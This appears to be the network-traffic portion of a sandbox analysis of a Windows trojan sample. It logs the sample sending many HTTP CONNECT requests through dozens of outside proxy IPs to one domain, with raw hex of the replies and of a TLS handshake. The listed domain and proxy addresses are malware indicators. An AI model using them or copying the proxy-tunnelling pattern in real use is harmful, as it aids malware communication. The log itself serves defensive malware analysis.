                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.581804991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                906192.168.2.852606192.111.139.163194045828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.488636971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                907192.168.2.852891102.223.20.217805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.488639116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.739238977 CET518INHTTP/1.1 302 Found
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Location: https://repository.gij.edu.gh
                                                                                Content-Length: 320
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 70 6f 73 69 74 6f 72 79 2e 67 69 6a 2e 65 64 75 2e 67 68 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://repository.gij.edu.gh">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                908192.168.2.85247194.16.118.6931285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.489298105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.491816998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.492050886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.581784010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:52.585342884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:04.585652113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:16.616655111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                909192.168.2.852405171.247.98.9010805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.489396095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                910192.168.2.852844221.2.84.42108005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.489398003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                911192.168.2.852919192.210.228.28156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.489487886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                912192.168.2.85287647.243.205.131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.489487886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                913192.168.2.8516162.239.213.13331285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.489803076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.491816998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.492048025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.581809998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                914192.168.2.85289847.242.15.120156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.495508909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                915192.168.2.85290898.170.57.24941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.497052908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                916192.168.2.8528838.222.175.210505545828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.515150070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                917192.168.2.852847103.182.213.100805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.536724091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.239197016 CET343INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 182
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                918192.168.2.851646128.199.221.91122595828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.537111044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.695023060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.695518017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.695220947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                919192.168.2.852470212.110.188.222344115828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.562242031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.694919109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.695501089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.695241928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:52.694770098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                920192.168.2.851742212.110.188.195344115828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.562396049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.694991112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.695497036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.695244074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                921192.168.2.852929209.97.150.16731285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.567270041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.732259989 CET28INHTTP/1.1 400 Bad Request


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                922192.168.2.851688114.129.2.8280815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.567323923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.695007086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                923192.168.2.85252298.178.72.21109195828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.567452908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                924192.168.2.852020142.54.235.941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.567929983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                925192.168.2.852916138.117.116.30440095828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.576196909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                926192.168.2.85264695.216.108.1731285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.587143898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.818672895 CET92INHTTP/1.0 200 Connection established
                                                                                Proxy-agent: Kerio Control/9.4.2 patch 1 build 7290


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                927192.168.2.852515135.181.102.11871175828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.589179993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.124671936 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                928192.168.2.852906115.74.159.3910805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.595268965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                929192.168.2.852905103.41.88.182825828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.615102053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382586002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.491982937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.679613113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.179425955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                930192.168.2.852937103.113.71.23010815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.656399965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                931192.168.2.852917203.74.125.1888885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.658310890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                932192.168.2.8529155.44.42.115583865828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.679521084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                933192.168.2.851759202.131.65.110805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.692574024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.044620991 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                934192.168.2.852974185.162.229.70805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.713717937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.801506042 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                935192.168.2.85292543.132.212.77805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.722271919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.027153969 CET59INHTTP/1.1 200 Connection Established
                                                                                Proxy-agent: nginx
                                                                                Feb 23, 2024 14:28:29.053703070 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 9d 7c 4e 3f 86 15 6d 9e c3 f1 a3 20 02 51 78 75 f6 58 ed 21 46 f1 9a 30 33 34 01 a3 da 86 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: e|N?m QxuX!F034*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#]31VM\11_&nk7%6ydd`8
                                                                                Feb 23, 2024 14:28:29.367768049 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 d8 9d 7d 29 0b b8 91 ed 3d 0f ca b8 72 b1 8a 18 ca 85 a2 ed d3 63 b9 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 cb 0b 00 10 c7 00
                                                                                Data Ascii: C?e})=rcDOWNGRD/#00`4ZmQ0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240212203110Z240512203109Z03110/
                                                                                Feb 23, 2024 14:28:29.367829084 CET1286INData Raw: 6d dd 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 1f 8b 40 68 93 64 2a 2d dc 07 bd 7a 5f 46 c4 ea f2 c8 d7 63 e0 4e cc 42 c7 44 46 d1 17 84 d3 1f 08 47 69 c2 b6 7f dd 9d a0 2d 9e 1b be 1f f8 19 ab ad d9 8d 7d 14 62 f3 40 cf 76 94
                                                                                Data Ascii: m0*H@hd*-z_FcNBDFGi-}b@v*wTJ;dm55inz74|"@,+v?iS't;H%['rBu*q,/aeYXhV
                                                                                Feb 23, 2024 14:28:29.367872953 CET1286INData Raw: 59 02 10 51 5c e3 c0 2b fd b7 06 48 51 7e 09 5e 3f 0f dc a7 fe 97 e7 79 c5 0e 44 89 78 c5 69 59 29 a0 9a 3a 48 36 29 a6 94 93 55 2d b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd
                                                                                Data Ascii: YQ\+HQ~^?yDxiY):H6)U-G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\
